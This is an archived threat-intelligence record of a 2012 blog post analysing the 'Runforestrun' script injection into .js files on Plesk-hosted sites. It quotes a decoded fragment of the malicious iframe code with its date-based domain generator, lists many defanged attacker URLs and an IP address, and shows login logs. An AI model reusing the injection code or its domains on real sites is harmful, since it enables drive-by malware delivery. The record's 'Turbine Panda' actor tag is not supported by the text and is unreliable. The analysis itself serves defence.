{
	"id": "87725d36-8c66-4858-ad84-68d0bcd0099e",
	"created_at": "2026-04-06T00:12:43.167213Z",
	"updated_at": "2026-04-10T03:26:19.306485Z",
	"deleted_at": null,
	"sha1_hash": "fc66447363ce63032aab95f8b971eec5a3c7812d",
	"title": "Runforestrun and Pseudo Random Domains",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 131497,
	"plain_text": "Runforestrun and Pseudo Random Domains\r\nArchived: 2026-04-05 13:30:54 UTC\r\nToday I came across an interesting attack that injects malicious scripts at the very bottom of existing .js files.\r\nUpdate: at the bottom of this post you’ll find information about how a security hole in Plesk Panel was used to\r\ninfect websites. Comments are also worth reading.\r\nUpdate (July 26, 2012): The attack has changed both the injected script and the domain generating algorithm. See\r\ndetails in my follow up article. Information about the Plesk security issues can still be found in the current\r\npost and comments.\r\nThe script (surrounded by the /*km0ae9gr6m*/…/*qhk6sa6g1c*/ pair of comments) looks like this:\r\nFull source code can be found here\r\nOn Google diagnostic pages of infected sites you will currently see something like this\r\nMalicious software is hosted on 2 domain(s), including ctonxidjqijsnzny .ru/, znycugibimtvplve .ru/.\r\nI say “currently”, because the most interesting thing about this script is the built-in domain name generator.\r\nIf you decode the script (see the code), you will see functions with names like nextRandomNumber,\r\nRandomNumberGenerator, createRandomNumber and generatePseudoRandomString and the iframe URL\r\ngeneration based on the current date and time:\r\nvar unix = Math.round(+new Date() / 1000);\r\nvar domainName = generatePseudoRandomString(unix, 16, 'ru');\r\nifrm = document.createElement(\"IFRAME\");\r\nifrm.setAttribute(\"src\", \"http://\" + domainName + \"/runforestrun?sid=cx\");\r\nIt’s not a new tactic to use pseudo random domain name generators for drive by download attacks. I have already\r\ndescribed algorithms based on quite unpredictable factors such as Twitter trending topics. 
https://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/\r\nPage 1 of 8\n\nAttackers had only a\r\nfew hours to a couple of days to register and properly configure new domains before malicious script would begin\r\nsending traffic to them.\r\nUnlike that Twitter-based algorithm, this new attack has a really dumb pseudo random string generator. It’s based\r\non such a predictable factor as the current date and time (before noon or after noon). It generates new domain names\r\nevery 12 hours.\r\nPredicted malicious URLs and sink holes\r\nNo wonder, it only took a couple of minutes to write a simple script that predicts URLs of the malicious iframes\r\nthat this attack will use by the end of summer of 2012. Then a quick check showed that 89 of the domain names\r\n(up to August 7th, 2012) are already registered and point to 95.211.27.206. When I try to open the predicted\r\nmalicious URLs I see the “domain suspended due to abuse reports” message. It looks like someone has already\r\ntaken care of this attack and sink-holed its domain names.\r\nOr is it just a trick that attackers use to make me think that there is nothing to worry about? It looks quite\r\nsuspicious that 95.211.27.206 is on Leaseweb (cybercriminals like to use this hosting provider), and nameservers\r\nhave Russian names “evilstalin.compress.to” and “smolny.compress.to“. At the same time all domains are\r\nregistered by a “Private Person” using a Russian registrar NAUNET that is known for being loyal to spammers\r\nand other cybercriminals. 
The WHOIS information and IP addresses for domains registered before the beginning\r\nof the attack (on June 8th) are the same as for domain names that had been registered just yesterday — this means\r\nthat they all have been registered by the attackers.\r\nAnd if you read comments to the following reddit thread, you will see that some people get the “domain\r\nsuspended due to abuse” message while others get redirected to “hxxp://db8237d82bdu .ipq .co/feed/xml.php?\r\nuid=12” and “hxxp://masvip .ru/6662/take.html“, which suggests that there is some server-side logic that filters\r\ntraffic (probably by IP, Referrer, etc.)\r\nUpdate (June 28, 2012): Today I saw myself how the “hxxp://gytcnulxsxpsqkfn .ru/runforestrun?sid=cx” URL\r\nreturned a 302 redirect to “hxxp://insurancecentre .ru/in.cgi?7“, which in turn redirected to “hxxp://freshtds\r\n.eu/default.cgi“.\r\nAnd what do you think? Are these domains sink-holed or do they only pretend to be sink-holed?\r\nBy the way, here’s my list of the predicted malicious URLs.\r\nUpdate (July 6, 2012): At this point I see that predicted domain names are already registered through September\r\n7th, 2012, so I generated a new list (up to October 9th) and put it here: http://pastebin.com/iZWFrDPC\r\nUpdate (July 26, 2012): The attack has changed both the injected script and the domain generating algorithm. 
See\r\ndetails in my follow up article.\r\nhxxp://xmexlajhysktwdqe .ru/runforestrun?sid=cx\r\nhxxp://atsihkcljrqlzvku .ru/runforestrun?sid=cx\r\nhxxp://kahmnunornwrgpgb .ru/runforestrun?sid=cx\r\nhxxp://mfwqdxgdpwiojrjp .ru/runforestrun?sid=cx\r\nhxxp://wmiudbgrcvapriql .ru/runforestrun?sid=cx\r\nhxxp://yrxysfyekjfooere .ru/runforestrun?sid=cx\r\nhxxp://jzkitejvrxgkgpgi .ru/runforestrun?sid=cx\r\nhxxp://lfbovcaitdrjmkbe .ru/runforestrun?sid=cx\r\nhxxp://ulnrpbudycxzdlkt .ru/runforestrun?sid=cx\r\nhxxp://xqcwfwfphwoieuny .ru/runforestrun?sid=cx\r\nhxxp://hyoflopkupjioiqq .ru/runforestrun?sid=cx\r\nhxxp://keglxucgvwhqttmi .ru/runforestrun?sid=cx\r\nhxxp://tlrnhskrgijhwtlj .ru/runforestrun?sid=cx\r\nhxxp://vqhtwlshzzqsltcp .ru/runforestrun?sid=cx\r\nhxxp://gytcnulxsxpsqkfn .ru/runforestrun?sid=cx\r\nhxxp://iekiyvsbtyozmmwy .ru/runforestrun?sid=cx\r\nhxxp://dernflilrdxmfnye .ru/runforestrun?sid=cx\r\nhxxp://fjgtmicxtlxynlpf .ru/runforestrun?sid=cx\r\nhxxp://ppsvcvrcgkllplyn .ru/runforestrun?sid=cx\r\nhxxp://ruhctasjmpqbyvhm .ru/runforestrun?sid=cx\r\nhxxp://bdvkpbuldslsapeb .ru/runforestrun?sid=cx\r\nhxxp://eilqnjkoytyjuchn .ru/runforestrun?sid=cx\r\nhxxp://npxsiiwpxqqiihmo .ru/runforestrun?sid=cx\r\nhxxp://qtmyeslmsoxkjbku .ru/runforestrun?sid=cx\r\nhxxp://adbjjkquyyhyqknf .ru/runforestrun?sid=cx\r\nhxxp://ciqmhuwgvfsxdtrw .ru/runforestrun?sid=cx\r\nhxxp://mocrafrewsdjztbj .ru/runforestrun?sid=cx\r\nhxxp://otruvbidvikzhlop .ru/runforestrun?sid=cx\r\nhxxp://yafzvancybuwmnno .ru/runforestrun?sid=cx\r\nhxxp://bhujzorkulhkpwob .ru/runforestrun?sid=cx\r\nhxxp://lohnrnnpvvtxedfl .ru/runforestrun?sid=cx\r\nhxxp://ntvrnrdpyoadopbo .ru/runforestrun?sid=cx\r\nhxxp://wakvnkyzkyietkdr .ru/runforestrun?sid=cx\r\nhxxp://zfyafrjmmajqfvbh .ru/runforestrun?sid=cx\r\nhxxp://jnlkttkruqsdjqlx .ru/runforestrun?sid=cx\r\nhxxp://lsbppxhgckolsnap 
.ru/runforestrun?sid=cx\r\nhxxp://vznrahwzgntmfcqk .ru/runforestrun?sid=cx\r\nhxxp://xeeypppxswpquvrf .ru/runforestrun?sid=cx\r\nhxxp://inqgvoeohpcsfxmn .ru/runforestrun?sid=cx\r\nhxxp://ksgmckchdppqeicu .ru/runforestrun?sid=cx\r\nhxxp://uyrorwlibbjeasoq .ru/runforestrun?sid=cx\r\nhxxp://wejungvnykczyjam .ru/runforestrun?sid=cx\r\nhxxp://gmvdnpqbblixlgxj .ru/runforestrun?sid=cx\r\nhxxp://jrkjelzwleadyxsd .ru/runforestrun?sid=cx\r\nhxxp://sywleisrsstsqoic .ru/runforestrun?sid=cx\r\nhxxp://venrfhmthwpqlqge .ru/runforestrun?sid=cx\r\nhxxp://fmacqvmqafqwmebl .ru/runforestrun?sid=cx\r\nhxxp://hrpgglxvqwjesffr .ru/runforestrun?sid=cx\r\nhxxp://rxbkqfydlnzopqrn .ru/runforestrun?sid=cx\r\nhxxp://tdsorylshsxjeawf .ru/runforestrun?sid=cx\r\nhxxp://elfxqghdubihhsgd .ru/runforestrun?sid=cx\r\nhxxp://gqtcxunxhyujqjkf .ru/runforestrun?sid=cx\r\nhxxp://qxggipnnfmnihkic .ru/runforestrun?sid=cx\r\nhxxp://sdxkjaophbtufumx .ru/runforestrun?sid=cx\r\nhxxp://clkujrjqvexvbmoi .ru/runforestrun?sid=cx\r\nhxxp://fqyyxagzkrpvxtki .ru/runforestrun?sid=cx\r\nhxxp://owldagkyzrkhqnjo .ru/runforestrun?sid=cx\r\nhxxp://rccjvgsgffokiwze .ru/runforestrun?sid=cx\r\nhxxp://blorcdyiipxcwyxv .ru/runforestrun?sid=cx\r\nhxxp://dpewaddpoewiycnj .ru/runforestrun?sid=cx\r\nhxxp://nwpykqeizraqthry .ru/runforestrun?sid=cx\r\nhxxp://pchgijctfprxhnje .ru/runforestrun?sid=cx\r\nhxxp://zisiiogqigzzqqeq .ru/runforestrun?sid=cx\r\nhxxp://cpittmwbqtjrjpql .ru/runforestrun?sid=cx\r\nhxxp://mvuvchtcxxibeubd .ru/runforestrun?sid=cx\r\nhxxp://oblcasnhxbbocpfj .ru/runforestrun?sid=cx\r\nhxxp://xixftoplsduqqorx .ru/runforestrun?sid=cx\r\nhxxp://bpnqmxkpxxgbdnby .ru/runforestrun?sid=cx\r\nhxxp://kvzstpqmeoxtcwko .ru/runforestrun?sid=cx\r\nhxxp://nbqypqrjiqxlfvdj .ru/runforestrun?sid=cx\r\nhxxp://whddmvrxufbkkoew .ru/runforestrun?sid=cx\r\nhxxp://ymrhcvphevonympo 
.ru/runforestrun?sid=cx\r\nhxxp://jveqgnmjxkocqifr .ru/runforestrun?sid=cx\r\nhxxp://lavvckpordclbduy .ru/runforestrun?sid=cx\r\nhxxp://vhhzcvbegxbjsxke .ru/runforestrun?sid=cx\r\nhxxp://xmwettbvtbhvrjuo .ru/runforestrun?sid=cx\r\nhxxp://gacdiuwnhonuulpe .ru/runforestrun?sid=cx 95.211.27.206\r\nhxxp://ifrhgnqeeotnzrmz .ru/runforestrun?sid=cx\r\nhxxp://rmdlgyreitjsjkfq .ru/runforestrun?sid=cx\r\nhxxp://uqspvdwyltgcyhft .ru/runforestrun?sid=cx\r\nhxxp://ezfydrexncoidbus .ru/runforestrun?sid=cx\r\nhxxp://hfveiooumeyrpchg .ru/runforestrun?sid=cx\r\nhxxp://qlihxnncwioxkdls .ru/runforestrun?sid=cx 95.211.27.206\r\nhxxp://sqwlonyduvpowdgy .ru/runforestrun?sid=cx\r\nhxxp://dyjvewshptsboygd .ru/runforestrun?sid=cx\r\nhxxp://febcbuyswmishvpl .ru/runforestrun?sid=cx\r\nhxxp://plmekaayiholtevt .ru/runforestrun?sid=cx\r\nhxxp://rpckbgrziwbdrmhr .ru/runforestrun?sid=cx\r\nhxxp://cyosongjihugkjbg .ru/runforestrun?sid=cx Aug 7.\r\nhxxp://eefysywrvkgxuqdf .ru/runforestrun?sid=cx\r\nhxxp://nkrbvqxzfwicmhwb .ru/runforestrun?sid=cx\r\nhxxp://qphhsudsmeftdaht .ru/runforestrun?sid=cx\r\nhxxp://axtopsbtntqnfdyk .ru/runforestrun?sid=cx\r\nhxxp://ddkudnuklgiwtdyw .ru/runforestrun?sid=cx\r\nhxxp://mkwwclogcvgeekws .ru/runforestrun?sid=cx\r\nhxxp://opldkflyvlkywuec .ru/runforestrun?sid=cx\r\nhxxp://yvxfekhokspfuwqr .ru/runforestrun?sid=cx\r\nhxxp://bdprvpxdejpohqpt .ru/runforestrun?sid=cx\r\nhxxp://ljbvfrsvcevyfhor .ru/runforestrun?sid=cx\r\nhxxp://noqzuukouyfuyrmd .ru/runforestrun?sid=cx\r\nhxxp://xvcewyydwsmdgaju .ru/runforestrun?sid=cx\r\nhxxp://zatiscwwtipqlycd .ru/runforestrun?sid=cx\r\nhxxp://jjgshrjdcynohyuk .ru/runforestrun?sid=cx\r\nhxxp://mouwwvcwwlilnxub .ru/runforestrun?sid=cx\r\nhxxp://vuhaojpwxgsxuitu .ru/runforestrun?sid=cx\r\nhxxp://yayfefhrwawquwcw .ru/runforestrun?sid=cx\r\nhxxp://iiloishkjwvqldlq 
.ru/runforestrun?sid=cx\r\nhxxp://knauycqgsdhgbwjo .ru/runforestrun?sid=cx\r\nhxxp://uumwyzhctrwdsrdp .ru/runforestrun?sid=cx\r\nhxxp://wzbdwenwshfzglwt .ru/runforestrun?sid=cx\r\nhxxp://hiplksflttfkpsxn .ru/runforestrun?sid=cx\r\nhxxp://jnfrqmekhoevppvw .ru/runforestrun?sid=cx\r\nhxxp://ttqtkmthptxvwiku .ru/runforestrun?sid=cx\r\nhxxp://vygzhvfiuommkqfj .ru/runforestrun?sid=cx\r\nhxxp://fhuidtlqttqxgjvn .ru/runforestrun?sid=cx\r\nhxxp://imjosxuhbcdonrco .ru/runforestrun?sid=cx\r\nhxxp://rtvqcdpbqxgwnrcn .ru/runforestrun?sid=cx\r\nhxxp://tykvyflnjhbnqpnr .ru/runforestrun?sid=cx\r\nhxxp://ehyewyqydfpidbdp .ru/runforestrun?sid=cx\r\nhxxp://gmokuosvnbkshdtd .ru/runforestrun?sid=cx\r\nhxxp://qsbourrdxgxgwepy .ru/runforestrun?sid=cx\r\nhxxp://sxpskxdgoczvcjgp .ru/runforestrun?sid=cx\r\nhxxp://dhedppigtpbwrmpc .ru/runforestrun?sid=cx\r\nhxxp://flthmyjeuhdygshf .ru/runforestrun?sid=cx\r\nhxxp://osflhkaowydftniw .ru/runforestrun?sid=cx\r\nhxxp://rxupwhkznihnxzqx .ru/runforestrun?sid=cx\r\nhxxp://bgjzhlasdrwwnenj .ru/runforestrun?sid=cx\r\nhxxp://elxegvkalqvkyoxc .ru/runforestrun?sid=cx\r\nhxxp://nrkhysgoltauclop .ru/runforestrun?sid=cx\r\nhxxp://pwyloytoagndnrex .ru/runforestrun?sid=cx\r\nhxxp://zenquqdskekaudbe .ru/runforestrun?sid=cx\r\nhxxp://cldcrgtnuwvgnbfd .ru/runforestrun?sid=cx\r\nhxxp://mroeqjdaukskbgua .ru/runforestrun?sid=cx\r\nhxxp://owekhoeuhmdiehrw .ru/runforestrun?sid=cx\r\nhxxp://ydrngsmrdiiyvoiy .ru/runforestrun?sid=cx\r\nhxxp://bkhyiqitpoxewhmt .ru/runforestrun?sid=cx\r\nWhat’s the security hole?\r\nAnother important question is how all those legitimate sites had been compromised in the first place.\r\nAt this point I haven’t had a chance to work directly with infected sites and check what’s going on inside. So I\r\nhave to resort to analysis of factors that I can see from outside. 
I checked about a dozen infected sites and they\r\nall use different web technologies from ASP.NET to pure HTML. They are all on different web servers: IIS,\r\nLitespeed, Apache. The only common link I can see is Plesk. When I check other sites on the same IP addresses I\r\nusually find a few more infected sites (not all though). So could this be some security hole in Plesk that made this\r\nattack possible? What do you think?\r\nUpdate (June 23, 2012): Thanks to everyone who left comments. The problem seems to be really in Plesk. Axel\r\nfound traces of the attack in Plesk access logs. The attacker logged in and used file manager’s editor to modify .js\r\nfiles. Axel blames the Plesk vulnerability (versions before 10.4 are affected) found earlier this year and suggests\r\nthat server admins fix it: http://kb.parallels.com/en/113321 and reset passwords for all plesk accounts:\r\nSo if you are affected, then immediately change passwords of ALL Plesk accounts. This means: Plesk-admin-user, all reseller-accounts, all domain-administrators, FTP users of subdomains and web users of\r\ndomains. And of course, if not previously done, update your Plesk installation!!\r\nHere’s one more useful link for server admins: How to make sure your Plesk Panel 8.x, 9.x, 10.0, 10.1, 10.2, or\r\n10.3 is not vulnerable\r\nTo webmasters: If your site is affected by this hack, contact your hosting provider ASAP and show them this\r\npost. Change your account passwords. And if your host resets your passwords there is a good reason for that.\r\nDon’t change your passwords back to your old ones!\r\nUpdate 2 (June 25, 2012): To find out more about this problem, I asked Axel a few questions and he agreed to\r\nexplain what’s going on:\r\nIt is important to distinguish between the attack and the security hole. 
The attack was not carried out\r\ndirectly by a security hole, but by means of a valid username/password combination.\r\nThe attacker used the built-in Plesk File Manager to replace files, so there are no entries in other log\r\nfiles (such as FTP-log -\u003e Shafiq’s comment). And there were a number of files changed with the same\r\njavascript code at a time. As you can see in the log-excerpt, there were 3 replacements:\r\njavascript_a1cb3a5978.js / jquery.min.js / easySlider1.7.js\r\nThis file selection has been very well analyzed (no TYPO3 standard files), so it is also clear that it was\r\nnot an automated attack, but was executed by a human. By the way: the origin of my attack was another\r\ncompromised server from Germany.\r\nHowever, the real problem was/is the Plesk vulnerability (http://kb.parallels.com/en/113321). Many\r\nadmins do not realize that their passwords have been spied out weeks or months ago. To make it more\r\nclear: Due to the Plesk vulnerability database tables could be read. And unfortunately all Passwords in\r\nPlesk are stored in plain text!! Take a look in database ‘psa‘ at table ‘accounts‘ (and better sit down\r\nbefore doing that!). That’s why it is so important to change ALL passwords.\r\nJust fixing this vulnerability AFTER the server has been compromised, without changing ALL\r\npasswords, leaves valid username/password combinations! So the attacker can come back after weeks or\r\nmonths and attack even in the meantime updated Plesk systems!!!\r\nHow can one find out whether the server has been compromised (weeks ago)? This is actually very\r\ndifficult. For me it works to look at the Plesk Action Log: There were times where I detected many VALID\r\naccount logins from different IPs in a very short time. 
This can’t be real and seems to be a kind of\r\nautomated control of the captured login data. A very clear sign of the attack :-(\r\nPlesk Action Log excerpt:\r\n46.10.200.000 site1 [2012-02-16 17:11:47] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n187.20.211.000 site2 [2012-02-16 17:11:47] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n118.71.113.000 site3 [2012-02-16 17:11:48] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n94.189.172.000 site4 [2012-02-16 17:11:49] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n86.194.202.000 site5 [2012-02-16 17:11:54] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n190.145.1.000 site6 [2012-02-16 17:11:55] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n94.156.241.00 site7 [2012-02-16 17:11:56] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n83.29.250.00 site8 [2012-02-16 17:11:58] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n...\r\n99.238.82.000 site5 [2012-02-19 00:04:05] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n93.194.210.00 site4 [2012-02-19 00:04:05] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n213.37.176.000 site3 [2012-02-19 00:04:05] 'CP User Login' ('Contact Name': ''=\u003e 'xxxxxxxxx')\r\n175.108.102.000 site1 [2012-02-19 00:04:06] 'CP User Login' ('Contact Name': '' =\u003e 'xxxxxxxxx')\r\n180.220.149.000 site7 [2012-02-19 00:04:09] 'CP User Login' ('Contact Name': '' =\u003e 'xxxxxxxxx')\r\n196.221.180.000 site8 [2012-02-19 00:04:09] 'CP User Login' ('Contact Name': '' =\u003e 'xxxxxxxxx')\r\n99.238.82.000 site5 [2012-02-19 00:04:13] 'CP User Logout' ('Contact Name': 'xxxxxxxxx' =\u003e '')\r\nI hope this helps\r\nAxel\r\n…\r\nUpdate (July 8, 2012): Here’s an interesting thread on the Parallels forum where server 
admins say that they\r\napplied security patches and reset passwords but their servers were re-infected shortly after that. Does anyone have a\r\nproven solution to permanently fix this issue without breaking the File Manager (as suggested in the following\r\ncomment)?\r\nA few more questions to admins of affected servers. Especially if your servers got reinfected after changing\r\npasswords and applying security patches.\r\n1. Did you consider use of backdoors? Did you search for backdoors?\r\n2. Did you consider the scenario where hackers created some rogue users on your server? Maybe even an extra\r\nadmin user? Did you try to search for users with suspicious activity or with excessive permissions?\r\nBy the way, rumor has it that on hacker forums, someone offers an exploit (quite expensive) for Plesk \u003c=10.4\r\nthat allows obtaining the admin password and remotely executing code on the server (looks like it’s for Windows servers\r\nonly).\r\nUpdate (July 15, 2012): Parallels has just released the “Big” Security Update for Plesk v8-10 (all OS) and Plesk\r\n11 (Windows only). They don’t disclose details but mention that the security issue is “critical” and they found it\r\nduring internal testing. Not sure whether it can fix this current issue but it is definitely something administrators of\r\nservers with Plesk Panel should do. 
(And then comment whether it helped or not)\r\nYour thoughts and comments are highly appreciated.\r\nRelated posts:\r\nRunForestRun Now Encrypts Legitimate JS Files\r\nMillions of Website Passwords Stored in Plain Text in Plesk Panel\r\nLorem Ipsum and Twitter Trends in Malware\r\nHackers Use Twitter API To Trigger Malicious Scripts\r\nIntroduction to Website Parasites\r\nSource: https://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/"
	],
	"report_names": [
		"runforestrun-and-pseudo-random-domains"
	],
	"threat_actors": [
		{
			"id": "3fad11c6-4336-4b28-a606-f510eca5452e",
			"created_at": "2022-10-25T16:07:24.346573Z",
			"updated_at": "2026-04-10T02:00:04.948823Z",
			"deleted_at": null,
			"main_name": "Turbine Panda",
			"aliases": [
				"APT 26",
				"Black Vine",
				"Bronze Express",
				"Group 13",
				"JerseyMikes",
				"KungFu Kittens",
				"PinkPanther",
				"Shell Crew",
				"Taffeta Typhoon",
				"Turbine Panda",
				"WebMasters"
			],
			"source_name": "ETDA:Turbine Panda",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"FF-RAT",
				"FormerFirstRAT",
				"Hurix",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mivast",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sakula",
				"Sakula RAT",
				"Sakurel",
				"Sogu",
				"StreamEx",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon",
				"ffrat"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434363,
	"ts_updated_at": 1775791579,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fc66447363ce63032aab95f8b971eec5a3c7812d.pdf",
		"text": "https://archive.orkl.eu/fc66447363ce63032aab95f8b971eec5a3c7812d.txt",
		"img": "https://archive.orkl.eu/fc66447363ce63032aab95f8b971eec5a3c7812d.jpg"
	}
}